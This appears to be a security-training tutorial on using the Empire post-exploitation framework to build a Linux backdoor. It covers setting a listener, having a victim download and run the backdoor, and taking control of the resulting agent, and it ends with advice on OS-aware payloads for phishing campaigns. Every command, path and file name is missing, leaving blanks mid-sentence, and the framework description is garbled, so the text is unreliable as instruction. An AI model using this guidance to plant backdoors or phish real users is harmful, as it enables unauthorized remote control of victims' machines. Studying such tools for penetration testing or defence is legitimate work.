White Hat Institute

Creating Linux backdoor with the Empire tool

Empire is a post-exploitation framework. It’s an unadulterated PowerShell agent, concentrated exclusively on python with cryptographically secure communications with the add-on of flexible architecture. Empire has the means to execute PowerShell agents without the requirement of PowerShell.exe. 

PowerShell gives abundant offensive preferences which further incorporate the complete access of .NET, app lock whitelisting, and straight access to Win32. It likewise builds malicious binaries in memory. It gives C2 functionality and enables you to embed the second stage after the first. It can also be utilized for lateral movement.

Navigate to the  directory and run the tool using the  command, then list all available stagers with  command. To target Linux operating systems, select the  stager by using the  command. Use the  command to list all setting options that you can edit.

Linux backdoor, empire

Next, we need to set the  to the listener we created before and the path of  where we can save our backdoor. In this example, we set the listener to  and the output file to  directory and named it as 

Linux backdoor 2

Now let’s go to our target computer and download the backdoor from the attacker’s web server.

Linux backdoor 3

Generally, people who use Linux operating system run executable programs from the terminal. So open up the terminal and navigate to the  directory then run the backdoor using the  command

Linux backdoor 4

Once our victim runs the backdoor, the attacker’s computer will receive an active agent and can interact with it to exploit further, as is shown in the screenshot below.

Linux backdoor 5

We come across organizations of all sizes, forms, and compositions throughout our research. One that we’ve seen many times has a reasonably equal blend of Windows and Apple OSX operating systems. It can be difficult to tell which users are using Windows and which are using OSX in normal circumstances. This makes phishing with malware more difficult. There will be no shell if the wrong payload is sent to the wrong operating system.

As a workaround, we can add intelligence to our malware to determine whether to execute a PowerShell or Python payload depending on the target operating system. We now have ready-made stagers to achieve this goal thanks to the incorporation of the PowerShell Empire and EmPyre projects into PowerShell Empire 2.0.